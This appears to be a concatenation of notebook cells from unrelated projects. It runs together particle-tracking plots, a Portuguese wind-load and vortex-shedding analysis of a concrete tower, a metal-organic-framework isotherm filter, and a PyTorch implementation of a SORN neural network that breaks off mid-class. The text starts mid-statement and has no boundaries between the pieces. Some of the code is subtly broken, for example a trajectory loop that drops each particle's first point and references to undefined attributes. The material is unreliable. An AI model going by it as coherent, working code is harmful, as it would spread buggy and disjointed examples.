matplotlib import pyplot as plt # Make trajectory structure here for now, should go somewhere else as a function rs ={} for t in G.particles: for ID in t['id']: idint=int(ID) res = np.where(t['id']==ID) index = res[0][0] if(ID not in rs.keys()): rs[idint]={'x':[],'y':[],'z':[], 't':[], 'GBz':[]} else: rs[idint]['x'].append(t['x'][index]) rs[idint]['y'].append(t['y'][index]) rs[idint]['z'].append(t['z'][index]) rs[idint]['t'].append(t['t'][index]) # rs[idint]['GBz'].append(t['GBz'][index]) for ind in rs.keys(): for var in rs[ind]: rs[ind][var]=np.array(rs[ind][var]) for ind in rs.keys(): plt.plot(rs[ind]['z'][0],rs[ind]['x'][0]*1e2, color='red', marker='o') plt.plot(rs[ind]['z'],rs[ind]['x']*1e2, color='black', alpha=0.1) plt.ylim(-1.5, 1.5) plt.xlim(0, 0.1) plt.title('GPT tracking') plt.xlabel('z (m)'); plt.ylabel('x (cm)'); zlist = np.array([P['mean_z'] for P in G.particles]) np.argmin(abs(zlist - 0.15)) G.particles[3]['mean_z'] #G.particles[3].write('$HOME/Scratch/gpt_apex_100pC_4x.h5') G.archive('gpt_apex_gun.h5') G2 = GPT() G2.load_archive('gpt_apex_gun.h5') G2.particles[3]['mean_z'] G.tout plt.plot(np.array([P['n_particle'] for P in G.particles]))1. Cálculo pelo processo convencionalOs dados da torre fornecidos para o problema são:\begin{align}\gamma_{concreto} &= 2500 kg/m^3\\F_{ck} &= 30MPa\end{align}![dados.PNG](attachment:dados.PNG)A_F = np.pi*(5**2 - 4.6**2)/4 A_L = np.pi*(10**2)/4 mi_F = A_F * 2500 m_L = 5* A_L *0.2*2500 print(" Massa por comprimento do fuste:{0:5.3f}kg/m.".format(mi_F)) print(" Massa das 5 lajes :{0:5.3f}kg.".format(m_L))Massa por comprimento do fuste:7539.822kg/m. Massa das 5 lajes :196349.541kg.As características do vento estão expostas abaixo:Vo = 46 ## Velocidade básica do vento S1 = 1.0 ## Fator topográfico S3 = 1.0 ## Fator estatístico ## Para categoria III e classe C. b = 0.93 p = 0.115 ################################ z = [4,12.5,21.5,30.5,39.5,46,50,54,58] ## discretização da altura da torre S2 = np.zeros(len(z)) for i in range (len(z)): S2[i] = b*0.95*(z[i]/10)**p Vk = S1*S2*S3*Vo ## Velocidade característica em cada alturaPara o cálculo dos esforços que atuarão na torre, é necessário a definição dos coeficientes de arrasto $C_a$( Tabela 10 da NBR 6123/88):C_F = 0.5 ## Coeficiente de arrasto do fuste C_K = 0.5 ## Coeficiente de arrasto do Kevlar Ca = np.ones(9)* C_FO cálculo da pressão dinâmica e da força de arrasto serão calculados, respectivamente, pelas seguintes equações:$${q} = 0.613 * V_k^2 \\$$$$ F_a = C_a * q * A $$q = 0.613*Vk**2 A = [41.25,45,45,45,45,40,40,40,40] F1 = Ca*q*A M1 = F1*z data = {'Vk (m/s)':Vk[::-1],'S2': S2[::-1],'A (m^2)':A[::-1], 'q (kPa)':q[::-1]/1000,'Ca':Ca[::-1],'F (kN)':F1[::-1]/1000,'M (kN.m)':M1[::-1]/1000} Plan = pd.DataFrame( data = data, index = z[::-1]) print(Plan)Vk (m/s) S2 A (m^2) q (kPa) Ca F (kN) M (kN.m) 58.0 49.746050 1.081436 40.00 1.516972 0.5 30.339448 1759.688004 54.0 49.338923 1.072585 40.00 1.492244 0.5 29.844878 1611.623405 50.0 48.904175 1.063134 40.00 1.466062 0.5 29.321241 1466.062032 46.0 48.437480 1.052989 40.00 1.438214 0.5 28.764282 1323.156986 39.5 47.596284 1.034702 45.00 1.388694 0.5 31.245616 1234.201845 30.5 46.201797 1.004387 45.00 1.308514 0.5 29.441554 897.967391 21.5 44.380767 0.964799 45.00 1.207397 0.5 27.166432 584.078297 12.5 41.697406 0.906465 45.00 1.065807 0.5 23.980656 299.758205 4.0 36.576427 0.795140 41.25 0.820093 0.5 16.914416 67.657663O somatório dos esforços são:print('Esforço cortante ={0:5.3f}N'.format(np.sum(F1))) print('Mommento fletor ={0:5.3f}N.m'.format(np.sum(M1)))Esforço cortante =247018.524N Mommento fletor =9244193.828N.m2. Solução pelo capítulo 9 da NBR6123/88 1. Método simplificadoPara a velocidade média do vento, utiliza-se a seguinte expressão:$$ V_k = 0.69*V_o*S1*S2 $$Para uma chaminé de concreto com razão uniforme (Tabela 19), tem-se:$$ \\ expoente\,da\,Forma \,modal = 1.7\\ $$$$Razão\, de \,amortecimento = 0.010 \\$$$$Frequência\, fundamental= 1.11 Hz$$Já a pressão dinâmica pode ser expressa por:$$ q = \overline{q_o}*b^2 \left[ \left( \frac{z}{z_r} \right) ^{2p}+\left(\frac{h}{z_r} \right) ^{p}*\left(\frac{z}{h} \right) ^{\gamma} *\frac{1+2*\gamma}{1+\gamma+p}*\xi\right]$$$$ \overline{q_o} = 0.613 * V_k^2 $$Pela interpolação linear da Figura 16, $ \xi = 1.50$ e pela tabela 20, tem-se que $ b = 0.86$ e $p = 0.185$Vk = S1*0.69*S3*Vo q = 0.613*Vk**2 q_d = np.zeros(9) for n in range (9): q_d[n] = q *0.86**2 *((z[n]/10)**(2*0.185) + (60/10)**0.185 *(z[n]/60)**1.7 * (1+2*1.7)*1.5/(1+1.7+0.185)) F2 = Ca*q_d*A M2 = F2*zMontando agora a tabela para o cálculo dos esforços:data = {'Vk (m/s)':Vk,'A (m^2)':A[::-1], 'q (kPa)':q_d[::-1]/1000,'Ca':Ca[::-1],'F (kN)':F2[::-1]/1000,'M (kN.m)':M2[::-1]/1000} Plan = pd.DataFrame( data = data, index = z[::-1]) print(Plan) print('Esforço cortante ={0:5.3f}N'.format(np.sum(F2))) print('Mommento fletor ={0:5.3f}N.m'.format(np.sum(M2)))Esforço cortante =257770.233N Mommento fletor =11044032.447N.m2. Método discreto![Discreto.PNG](attachment:Discreto.PNG)O capítulo 9 da norma estabelece o seguinte roteiro para a análise dinâmica$$ x_i = \left(\frac{z_i}{h}\right)^\gamma\\ $$$$ X_i = \overline{X_i} + \hat{X_i}\\ $$$$ \overline{X_i} = \overline{q_o}*b^2*C_{ai}*A_i*\left(\frac{z_i}{z_r}\right)^{2p}\\ $$$$ \hat{x_i} = FH *\phi_i* x_i\\ $$$$ \phi_i = \frac{m_i}{m_o}\\ $$$$ FH = \overline{q_o}*b^2*C_i*A_O* \frac{\sum_{n=1}^{n}\beta_i * x_i}{\sum_{n=1}^{n}\phi_i * x_i^2}*\xi\\ $$$$ A_o = \sum A_i \\ $$$$ m_o = \sum m_i \\ $$$$ \beta_i = C_{ai} * \frac{A_i}{A_o} \left( \frac{z_i}{z_r}\right)^p $$Onde $x_i$ é a forma modal, $X_i$ é a velocidade instantânea do vento, $\overline{X_i}$ é a velocidade média e $\hat{X_i}$ é a velocidade flutuante.xi = np.zeros(9) Xi_m = np.zeros(9) beta =np.zeros(9) mi = [24543.75, 34361.25, 35343,35343, 31346, 89559.5, 55779.3,55779.3, 75814.95] phi = np.zeros(9) for i in range(9): xi[i] = (z[i]/60)**1.7 beta[i] = 0.5* A[i]/sum(A)*(z[i]/10)**0.185 Xi_m[i] = q *0.86**2 * 0.5 * A[i] * (z[i]/10)**(2*0.185) phi[i] = mi[i]/sum(mi) FH = q * 0.86**2 * 0.5 * np.sum(A)*np.sum(beta*xi)/sum(phi*xi**2) * 1.5 xi_f = FH * phi * xi Xi = Xi_m + xi_f M3 = (Xi)*z data = {'A (m^2)':A[::-1],'m(kg)':mi[::-1],'beta':beta[::-1], 'phi':phi[::-1],'x': xi[::-1],'FH':FH,'X médio (kN)':Xi_m[::-1]/1000, 'x_f (kN)':xi_f[::-1]/1000,'Xi (kN)':Xi[::-1]/1000,'M (kN.m)':M3[::-1]/1000} Plan = pd.DataFrame( data = data, index = z[::-1]) print(Plan)A (m^2) m(kg) beta phi x FH \ 58.0 40.00 75814.95 0.072620 0.173145 0.943997 93106.752898 54.0 40.00 55779.30 0.071666 0.127388 0.836012 93106.752898 50.0 40.00 55779.30 0.070653 0.127388 0.733486 93106.752898 46.0 40.00 89559.50 0.069571 0.204534 0.636548 93106.752898 39.5 45.00 31346.00 0.076093 0.071587 0.491313 93106.752898 30.5 45.00 35343.00 0.072538 0.080716 0.316557 93106.752898 21.5 45.00 35343.00 0.067994 0.080716 0.174698 93106.752898 12.5 45.00 34361.25 0.061504 0.078474 0.069485 93106.752898 4.0 41.25 24543.75 0.045663 0.056053 0.010015 93106.752898 X médio (kN) x_f (kN) Xi (kN) M (kN.m) 58.0 17.505301 15.218129 32.723430 1897.958912 54.0 17.048529 9.915652 26.964181 1456.065753 50.0 16.569909 8.699632 25.269541 1263.477041 46.0 16.066512 12.122126 28.188638 1296.677363 39.5 [...]Portanto, os esforços na base são:print('Esforço cortante ={0:5.3f}N'.format(np.sum(Xi))) print('Mommento fletor ={0:5.3f}N.m'.format(np.sum(M3)))Esforço cortante =184796.132N Mommento fletor =7758874.472N.mComparando os valores obtidos por cada método disponível na NBR 6123\88, monta-se a seguinte tabela:data =[np.sum(F1)/1000,np.sum(M1)/1000,np.sum(F2)/1000,np.sum(M2)/1000,np.sum(Xi)/1000,np.sum(M3)/1000] comp = pd.DataFrame( data = data, index = ['Força convencional','Momento convecional','Força simplificada', 'Momento simplificado', 'Força discreta','Momento discreto'], columns = ['Valores']) print(comp)Valores Força convencional 247.018524 Momento convecional 9244.193828 Força simplificada 257.770233 Momento simplificado 11044.032447 Força discreta 184.796132 Momento discreto 7758.8744723. Desprendimento de vórtices pela norma canadenseA principio, deve-se calcular a velocidade crítica, que consiste na velocidade do vento em que a estrutura entrará em ressonância com as forças transversais.$$ V_{cr} = \frac{1}{S_t}*f*d $$Onde $S_t$ é o número de Strouhal, que pode apresentar os seguintes valores:$$ S_t = 0.2,\, 10^3 \leq R_e \leq 2 *10^6$$$$ S_t = 0.28,\, R_e \geq 2 *10^6$$O cálculo das características da torre, como módulo de elasticidade, momento de inércia e Rigidez estão apresentados abaixo:E = 6600*(30+3.5)**0.5 I = 0.25 * np.pi * (2.5**4 - 2.3**4) K = 3* E*I/(60**3)*10**6 print(' Módulo de elasticidade: {0:5.3f}MPa'.format(E),'\n', 'Momento de inércia: {0:5.3f}m^4'.format(I),'\n', 'Rigidez à flexão: {0:5.3f}N/m'.format(K))Módulo de elasticidade: 38200.262MPa Momento de inércia: 8.701m^4 Rigidez à flexão: 4616371.656N/mCalculando, agora, as frequências naturais da torre e da massa concentrada (Lajes) em cima dela, por meio das equações: ![freq.png](attachment:freq.png) Para a massa concentrada$$f = \frac{1}{2\pi}\sqrt{\frac{K}{m}}$$ Para a massa Distribuída$$f = \frac{3.52}{2\pi}\sqrt{\frac{EI}{ML^4}}$$ Tendo estes dois valores, é possível estimar a frequência natural da torre junto da massa, por meio da equação:$$ \frac{1}{f_n^2} = \frac{1}{f_1^2}+\frac{1}{f_2^2}$$f1 = 1/(2*np.pi)*np.sqrt(K/m_L) f2 = 3.52/(2*np.pi)*np.sqrt(E*10**6*I/(mi_F*60**4)) inv_fn = 1/(f1**2) + 1/(f2**2) fn = (1/inv_fn)**0.5 print(' Frequência das lajes: {0:5.3f}Hz'.format(f1),'\n', 'Freqência do fuste: {0:5.3f}Hz'.format(f2),'\n', 'Frequência da torre: {0:5.3f}Hz'.format(fn))Frequência das lajes: 0.772Hz Freqência do fuste: 1.033Hz Frequência da torre: 0.618HzCom o valor do número de Reynolds obtido nos itens anteriores, o número de Strouhal é o Seguinte:$$ S_t = 0.2$$ Calculando agora a velocidade crítica para os dois diâmetros da torre:v1 = 1/0.2 * fn * 5 v2 = 1/0.2 * fn * 10 print(' Velocidade crítica no fuste: {0:5.3f}m/s'.format(v1),'\n', 'Velocidade crítica no Kevlar: {0:5.3f}m/s'.format(v2))Velocidade crítica no fuste: 15.457m/s Velocidade crítica no Kevlar: 30.915m/sComo a velocidade de projeto é maior que as velocidades críticas, pode ocorrer desprendimento de vórtices. Os efeitos dinâmicos do desprendimento de vórtices podem ser aproximados por uma força estática lateral, atuando no terçosuperior, aplicada no ponto de máximo deslocamento da forma modal considerada. A força estática equivalente por unidade de altura, FL, é dada por:$$ F_L = \frac{C1}{\sqrt{\lambda}\sqrt{\beta- C_2 \frac{\rho D^2}{M}}}q_HD $$ Onde $\beta$ é o amortecimento em razão do crítico (0.010), $\lambda$ é a relação H/D, H é a altura da estrutura, $q_H$ é a pressão dinâmica correspondente a velocidade crítica( $q_H= 0.6*V_C^2$), M é a massa por unidade de altura do terço superior e $\rho$ é a densidade do ar(1.2 kg/m^3). Para a maioria dos casos:$$C_1 = \frac{3\sqrt{\lambda}}{4}$$ Os cálculos abaixo são referentes a determinação da força transversal equivalente que atuará na estrutura.rho = 1.2 lam = 60/5 C1 = 3*lam**0.5/4 C2 = 0.6 M_3 = ((60*mi_F)/3 + m_L)/(60/3) qh1 = 0.6 * v1**2 qh2 = 0.6 * v2**2 FL1 = C1/((lam**0.5) * (0.01-C2*1.2*5**2/M_3)**0.5) * qh1 *5 FL2 = C1/((lam**0.5) * (0.01- C2*1.2*10**2/M_3)**0.5) * qh2 *10 print(' λ: {0:5.3f}'.format(lam),'\n', ' C1: {0:5.3f}'.format(C1),'\n', ' C2: {0:5.3f}'.format(C2),'\n', ' Massa do terço final: {0:5.3f}kg/m'.format(M_3),'\n', ' Pressão dinâmica no Fuste: {0:5.3f}N/m²'.format(qh1),'\n', ' Pressão dinâmica no Kevlar: {0:5.3f}N/m²'.format(qh2),'\n', ' Força lateral no fuste: {0:5.3f}kN/m'.format(FL1/1000),'\n', ' Força lateral no Kevlar: {0:5.3f}kN/m'.format(FL2/1000))λ: 12.000 C1: 2.598 C2: 0.600 Massa do terço final: 17357.299kg/m Pressão dinâmica no Fuste: 143.356N/m² Pressão dinâmica no Kevlar: 573.425N/m² Força lateral no fuste: 5.678kN/m Força lateral no Kevlar: 56.220kN/mSe a seguinte relação for satisfeita, não haverá oscilações acima de um diâmetro:$$ \beta < C2\frac{\rho D^2}{M} $$beta = 0.01 X1 = C2*rho*5**2/M_3 X2 = C2*rho*10**2/M_3 print(' beta: {0:5.3f}'.format(beta),'\n', 'Fuste: {0:5.7f}'.format(X1),'\n', 'Kevlar: {0:5.7f}'.format(X2))beta: 0.010 Fuste: 0.0010370 Kevlar: 0.0041481Portanto, não ocorrerá deslocamentos superiores a um diâmetro.O cálculo dos esforços na base estão expostos a seguir:V1 = FL1 * 60 V2 = FL2 * 16 V = V1 + V2 M = V * 50 print(' Força adicional na base: {0:5.3f}kN'.format(V/1000),'\n', 'Momento fletor adicional na base: {0:5.3f}kN.m'.format(M/1000))Força adicional na base: 1240.218kN Momento fletor adicional na base: 62010.905kN.mExplorerimport pickle import yaml with open("data/nistdb.pickle", 'rb') as f: nistdb = pickle.load(f) with open("data/step-12-geometric.yml") as f: pv = yaml.safe_load(f) pv['CuBTC'] # Get all the isotherms from valid DOIs # i.e., containing characterization isotherms for which the MPV/CPV ratio is in a certain threshold MOF = 'CuBTC' MIN_THR_RATIO = 0.75 MAX_THR_RATIO = 1.10 max_pv_from_structure = max(pv[MOF]['structures'].values()) valid_dois = [ isot.split(".iso")[0] for isot, mpv in pv[MOF]['isotherms'].items() if MIN_THR_RATIOCuBTC Nitrogen 77 10.1016j.micromeso.2011.12.053.isotherm3 CuBTC Nitrogen 77 10.1007s10934-013-9692-4.isotherm1 CuBTC Nitrogen 77 10.1021acs.iecr.6b00774.Isotherm1 CuBTC Nitrogen 77 10.1021acs.iecr.6b00774.Isotherm2 CuBTC Nitrogen 77 10.1016j.talanta.2015.02.032.Isotherm1 CuBTC Nitrogen 77 10.1039c5ce00938c.Isotherm1 CuBTC Nitrogen 77 10.1016j.jcat.2014.07.010.Isotherm15 CuBTC Nitrogen 77 10.1016j.micromeso.2012.06.011.isotherm1 CuBTC Nitrogen 77 10.1021Jp207411b.isotherm2 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm10 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm9 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm6 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm5 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm4 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm8 CuBTC Hydrogen 298 10.1021Jp207411b.isotherm7 CuBTC Hydrogen 77 10.1021Jp207411b.isotherm3 CuBTC Hydrogen 323 10.1021Jp207411b.isotherm11 CuBTC Nitrogen 77 10.1021Jp207411b.isotherm1 CuBTC Nitrogen 77 10.1016j.catcom.2013.04.019.isotherm1 CuBTC [...]IMPORT LIBRARIESfrom __future__ import division import numpy as np from scipy.stats import norm import random import tqdm import pandas as pd from collections import OrderedDict import matplotlib.pyplot as plt import heapq import pickle import torch import torch.distributions as tdist # Define the default tensor type at the top # torch.set_default_tensor_type(torch.cuda.FloatTensor if torch.cuda.is_available() # else torch.FloatTensor) torch.set_default_tensor_type('torch.DoubleTensor') torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')VERIFY INSTALLED TORCH VERSION AND AVAILABLE GPU DEVICEtorch.__version__ print('Number of available devices:',torch.cuda.device_count()) print('Current device:',torch.cuda.current_device()) print('Current device name:', torch.cuda.get_device_name(torch.cuda.current_device())) ### Set all tensors as DoubleTensor by default # torch.set_default_tensor_type('torch.DoubleTensor') # As recommended by Pytorch Devs: use float32 instead of double ### WHITE GAUSSIAN NOISE GENERATOR def white_gaussian_noise(mu, sigma,t): """Generates white gaussian noise with mean mu, standard deviation sigma and the noise length equals t """ n = tdist.Normal(mu, sigma) noise = n.sample((t,)) return noiseUTIL FUNCTION TO GENERATE LAMBDA CONNECTION MATRICES Util function is called only during initialization; Doesnt require GPU support Written using Numpy# Implement lambda incoming and outgoing connections per neuron def generate_lambd_connections(synaptic_connection,ne,ni, lambd_w,lambd_std): if synaptic_connection == 'EE': """Choose random lamda connections per neuron""" # Draw normally distribued ne integers with mean lambd_w lambdas_incoming = norm.ppf(np.random.random(ne), loc=lambd_w*2 + 0.5, scale=lambd_std).astype(int) # lambdas_outgoing = norm.ppf(np.random.random(ne), loc=lambd_w, scale=lambd_std).astype(int) # List of neurons list_neurons= list(range(ne)) # Connection weights connection_weights = np.zeros((ne,ne)) # For each lambd value in the above list, # Choose the neurons in order [0 to 199] for neuron in list_neurons: ### Choose ramdom unique (lambdas[neuron]) neurons from list_neurons possible_connections = list_neurons.copy() possible_connections.remove(neuron) # Remove the selected neuron from possible connections i!=j possible_incoming_connections = random.sample(possible_connections,lambdas_incoming[neuron]) # Generate weights for incoming and outgoing connections # Gaussian Distribution of weights # weight_matrix = np.random.randn(Sorn.ne, Sorn.ni) + 2 # Small random values from gaussian distribution # Centered around 2 to make all values positive # weight_matrix*=0.01 # Setting spectral radius # Uniform Distribution: Weights are drawn randomly from the interval [0,1] incoming_weights = np.random.uniform(0.0,0.1,lambdas_incoming[neuron]) # ---------- Update the connection weight matrix ------------ # Update incoming connection weights for selected 'neuron' for incoming_idx,incoming in enumerate(incoming_weights): # Update the rows connection_weights[possible_incoming_connections[incoming_idx]][neuron] = incoming_weights[incoming_idx] return connection_weights if synaptic_connection == 'EI': """Choose random lamda connections per neuron""" # Draw normally distribued ni integers with mean lambd_w lambdas = norm.ppf(np.random.random(ni), loc=lambd_w*2 + 1, scale=lambd_std).astype(int) # List of neurons list_neurons= list(range(ni)) # Each i can connect with random ne neurons # Connection weights connection_weights = np.zeros((ni,ne)) # For each lambd value in the above list, # Choose the neurons in order [0 to 40] for neuron in list_neurons: ### Choose ramdom unique (lambdas[neuron]) neurons from list_neurons possible_connections = list(range(ne)) # possible_connections.remove(neuron) # Remove the selected neuron from possible connections i!=j # possible_incoming_connections = random.sample(possible_connections,lambdas[neuron]) # possible_incoming connections to the slected neuron possible_outgoing_connections = random.sample(possible_connections,lambdas[neuron]) # possible_outgoing connections to the neuron # Generate weights for incoming and outgoing connections # Weights are drawn randomly from the interval [0,1] # incoming_weights = np.random.random(lambdas[neuron]) # Incomig connections are column in the connection_weights matrix outgoing_weights = np.random.uniform(0.0,0.1,lambdas[neuron]) # Outgoing connections are rows in the connection_weights matrix # ---------- Update the connection weight matrix ------------ # Update outgoing connections for the neuron for outgoing_idx,outgoing_weight in enumerate(outgoing_weights): # Update the columns in the connection matrix connection_weights[neuron][possible_outgoing_connections[outgoing_idx]] = outgoing_weight return connection_weightsSANITY CHECK EACH WEIGHTS### NOTE REQUIRED; REFER CPU CODESHELPER FUNCTION TO NORMALIZE INCOMING WEIGHTSdef normalize_weight_matrix(weight_matrix): # Applied only while initializing the weight. Later Synaptic scalling applied on weight matrices """ Normalize the weights in the matrix such that incoming connections to a neuron sum up to 1 Args: weight_matrix(array) -- Incoming Weights from W_ee or W_ei or W_ie Returns: weight_matrix(array) -- Normalized weight matrix""" normalized_weight_matrix = weight_matrix / np.sum(weight_matrix,axis = 0) return normalized_weight_matrixSORN INITIALIZING CLASS: Init all required matrices for the network simulation and analysis NOTE: This class is called only once and it has no influence during simulation Hence, it is just build with numpy. Later its matrices are converted into torchable tensors during simulationclass Sorn(object): """SORN 2 network model Initialization""" def __init__(self): pass """Initialize network variables as class variables of SORN""" nu = 10 # Number of input units ne = 200 # Number of excitatory units ni = int(0.2*ne) # Number of inhibitory units in the network eta_stdp = 0.004 eta_inhib = 0.001 eta_ip = 0.01 te_max = 1.0 ti_max = 0.5 ti_min = 0.0 te_min = 0.0 mu_ip = 0.1 sigma_ip = 0.0 # Standard deviation, variance == 0 # Initialize weight matrices def initialize_weight_matrix(self, network_type,synaptic_connection, self_connection, lambd_w): if (network_type == "Sparse") and (self_connection == "False"): """Generate weight matrix for E-E/ E-I connections with mean lamda incoming and outgiong connections per neuron""" weight_matrix = generate_lambd_connections(synaptic_connection,Sorn.ne,Sorn.ni,lambd_w,lambd_std = 1) # Dense matrix for W_ie elif (network_type == 'Dense') and (self_connection == 'False'): # Gaussian distribution of weights # weight_matrix = np.random.randn(Sorn.ne, Sorn.ni) + 2 # Small random values from gaussian distribution # Centered around 1 # weight_matrix.reshape(Sorn.ne, Sorn.ni) # weight_matrix *= 0.01 # Setting spectral radius # Uniform distribution of weights weight_matrix = np.random.uniform(0.0,0.1,(Sorn.ne, Sorn.ni)) weight_matrix.reshape((Sorn.ne,Sorn.ni)) return weight_matrix def initialize_threshold_matrix(self, te_min,te_max, ti_min,ti_max): # Initialize the threshold for excitatory and inhibitory neurons """Args: te_min(float) -- Min threshold value for excitatory units ti_min(float) -- Min threshold value for inhibitory units te_max(float) -- Max threshold value for excitatory units ti_max(float) -- Max threshold value for inhibitory units Returns: te(vector) -- Threshold values for excitatory units ti(vector) -- Threshold values for inhibitory units""" te = np.random.uniform(0., te_max, (Sorn.ne, 1)) ti = np.random.uniform(0., ti_max, (Sorn.ni, 1)) return te, ti def initialize_activity_vector(self,ne, ni): # Initialize the activity vectors X and Y for excitatory and inhibitory neurons """Args: ne(int) -- Number of excitatory neurons ni(int) -- Number of inhibitory neurons Returns: x(array) -- Array of activity vectors of excitatory population y(array) -- Array of activity vectors of inhibitory population""" x = np.zeros((ne, 2)) y = np.zeros((ni, 2)) return x, yINITIALIZE MATRICES# Create and initialize sorn object and varaibles sorn_init = Sorn() # Sorn instance only for matrix initialization WEE_init = sorn_init.initialize_weight_matrix(network_type='Sparse',synaptic_connection = 'EE', self_connection='False',lambd_w = 10) WEI_init = sorn_init.initialize_weight_matrix(network_type='Sparse',synaptic_connection = 'EI', self_connection='False',lambd_w = 20) WIE_init = sorn_init.initialize_weight_matrix(network_type='Dense',synaptic_connection = 'IE', self_connection='False',lambd_w = None) Wee_init = WEE_init.copy() Wei_init = WEI_init.copy() Wie_init = WIE_init.copy() c = np.count_nonzero(Wee_init) # Max: 39800; Target: 3980 v = np.count_nonzero(Wei_init) # Max: 8000; target : 1600 : b = np.count_nonzero(Wie_init) # Max: 8000; Target: 8000 print(c,v,b)4003 1617 8000NORMALIZE THE INCOMING WEIGHTS# Normaalize the incoming weights i.e sum(incoming weights to a neuron) = 1 wee_init = normalize_weight_matrix(Wee_init) wei_init = normalize_weight_matrix(Wei_init) wie_init = normalize_weight_matrix(Wie_init)Rest of the code needs to build in torch using available Cuda device Check CUDA device# use_cuda = torch.cuda.is_available() # True # n_gpus = torch.cuda.device_count() # 1Use the default GPU device for all variables defined as tensor float data types Note this feaature is added in Torch 0.4 version CONVERT INITIALIZED WEIGHT MATRICES INTO TORCHABLE TENSORSwee_init = torch.from_numpy(wee_init).cuda() wei_init = torch.from_numpy(wei_init).cuda() wie_init = torch.from_numpy(wie_init).cuda()INITIALIZE THRESHOLD AND ACTIVITY MATRICES AND CONVERT THEM INTO TENSORSte_init, ti_init = sorn_init.initialize_threshold_matrix(Sorn.te_min,Sorn.te_max,Sorn.ti_min,Sorn.ti_max) x_init, y_init = sorn_init.initialize_activity_vector(Sorn.ne, Sorn.ni) te_init,ti_init = torch.from_numpy(te_init),torch.from_numpy(ti_init).cuda() x_init,y_init = torch.from_numpy(x_init),torch.from_numpy(y_init).cuda()Helpers functions with GPU support# Helpers for Plasticity.stdp() def prune_small_weights(weights,cutoff_weight): """ Prune the connections with negative connection strength""" # No need to define tensor data types explicitly since default tensor types # are already set using the execution line above - From Torch version 0.4 weights[weights <= cutoff_weight] = cutoff_weight return weights def set_max_cutoff_weight(weights, cutoff_weight): """ Set cutoff limit for the values in given array""" weights[weights > cutoff_weight] = cutoff_weight return weights # Helper for Plasticity.ss() def get_unconnected_indexes(wee): """ Helper function for Structural plasticity to randomly select the unconnected units Args: wee - Weight matrix Returns: list (indices) // indices = (row_idx,col_idx)""" i,j = torch.where(wee <= 0.).cuda() indices = list(zip(i,j)) self_conn_removed = [] for i,idxs in enumerate(indices): if idxs[0] != idxs[1]: self_conn_removed.append(indices[i]) return self_conn_removedPLASTICITY CLASS (Child of Class SORN) written in torch ; Instances of this class will be called iteratively during simulationclass Plasticity(Sorn): """ Instance of class Sorn. Inherits the variables and functions defined in class Sorn Encapsulates all plasticity mechanisms mentioned in the article """ # Initialize the global variables for the class //Class attributes def __init__(self): super().__init__() self.nu = torch.Tensor([Sorn.nu]).cuda() # Number of input units self.ne = torch.Tensor([Sorn.ne]).cuda() # Number of excitatory units self.eta_stdp = torch.Tensor([Sorn.eta_stdp]).cuda() # Learning rate in other words self.eta_ip = torch.Tensor([Sorn.eta_ip]).cuda() self.eta_inhib = torch.Tensor([Sorn.eta_inhib]).cuda() self.h_ip = torch.Tensor([2]) * torch.Tensor([Sorn.nu]) / torch.Tensor([Sorn.ne]) self.mu_ip = torch.Tensor([Sorn.mu_ip]).cuda() self.ni = torch.Tensor([Sorn.ni]).cuda() self.time_steps = torch.Tensor([Sorn.time_steps]).cuda() self.te_min = torch.Tensor([Sorn.te_min]).cuda() self.te_max = torch.Tensor([Sorn.te_max]).cuda() def stdp(self, wee, x, cutoff_weights): """ Apply STDP rule : Regulates synaptic strength between the pre(Xj) and post(Xi) synaptic neurons""" xt_1 = x[:,0].unsqueeze(1) xt = x[:,1].unsqueeze(1) wee_t = wee.clone().cuda() # STDP applies only on the neurons which are connected. for i in range(len(wee_t[0])): # Each neuron i, Post-synaptic neuron for j in range(len(wee_t[0:])): # Incoming connection from jth pre-synaptic neuron to ith neuron if wee_t[j][i] != 0. : # Check connectivity # Get the change in weight delta_wee_t = self.eta_stdp * (xt[i] * xt_1[j] - xt_1[i]*xt[j]).cuda() # Update the weight between jth neuron to i ""Different from notation in article wee_t[j][i] = wee[j][i].cuda() + delta_wee_t.cuda() """ Prune the smallest weights induced by plasticity mechanisms; Apply lower cutoff weight""" wee_t = prune_small_weights(wee_t,cutoff_weights[0]) """Check and set all weights < upper cutoff weight """ wee_t = set_max_cutoff_weight(wee_t,cutoff_weights[1]) return wee_t def ip(self, te, x): # IP rule: Active unit increases its threshold and inactive decreases its threshold. xt = x[:, 1].unsqueeze(1) te_update = te.cuda() + self.eta_ip.cuda() * (xt.cuda() - self.h_ip.cuda()) """ Check whether all te are in range [0.0,1.0] and update acordingly""" # Update te < 0.0 ---> 0.0 # Would be nice to have separate function name for thresholds # te_update = prune_small_weights(te_update,self.te_min) # Set all te > 1.0 --> 1.0 # te_update = set_max_cutoff_weight(te_update,self.te_max) return te_update def ss(self, wee_t): """Synaptic Scaling or Synaptic Normalization""" wee_t = torch.div(wee_t, torch.sum(wee_t,dim=0)).cuda() return wee_t def istdp(self, wei, x, y, cutoff_weights): # Apply iSTDP rule : Regulates synaptic strength between the pre(Yj) and post(Xi) synaptic neurons xt_1 = x[:, 0].unsqueeze(1) xt = x[:, 1].unsqueeze(1) yt_1 = y[:, 0].unsqueeze(1) yt = y[:, 1].unsqueeze(1) # iSTDP applies only on the neurons which are connected. wei_t = wei.clone() for i in range(len(wei_t[0])): # Each neuron i, Post-synaptic neuron: means for each column; for j in range(len(wei_t[0:])): # Incoming connection from j, pre-synaptic neuron to ith neuron if wei_t[j][i] != 0. : # Check connectivity # Get the change in weight delta_wei_t = - self.eta_inhib * yt_1[j] * (1 - xt[i]*(1 + 1/self.mu_ip)) # Update the weight between jth neuron to i ""Different from notation in article wei_t[j][i] = wei[j][i] + delta_wei_t """ Prune the smallest weights induced by plasticity mechanisms; Apply lower cutoff weight""" wei_t = prune_small_weights(wei_t,cutoff_weights[0]) """Check and set all weights < upper cutoff weight """ wei_t = set_max_cutoff_weight(wei_t,cutoff_weights[1]) return wei_t @staticmethod def structural_plasticity(wee): """ Add new connection value to the smallest weight between excitatory units randomly""" p_c = torch.randint(0, 10, 1).cuda() if p_c == 0: # p_c= 0.1 """ Do structural plasticity """ # Choose the smallest weights randomly from the weight matrix wee indexes = get_unconnected_indexes(wee).cuda() # Choose any idx randomly idx_rand = random.choice(indexes) if idx_rand[0] == idx_rand[1]: idx_rand = random.choice(indexes) wee[idx_rand[0]][idx_rand[1]] = 0.001 return wee ########################################################### @staticmethod 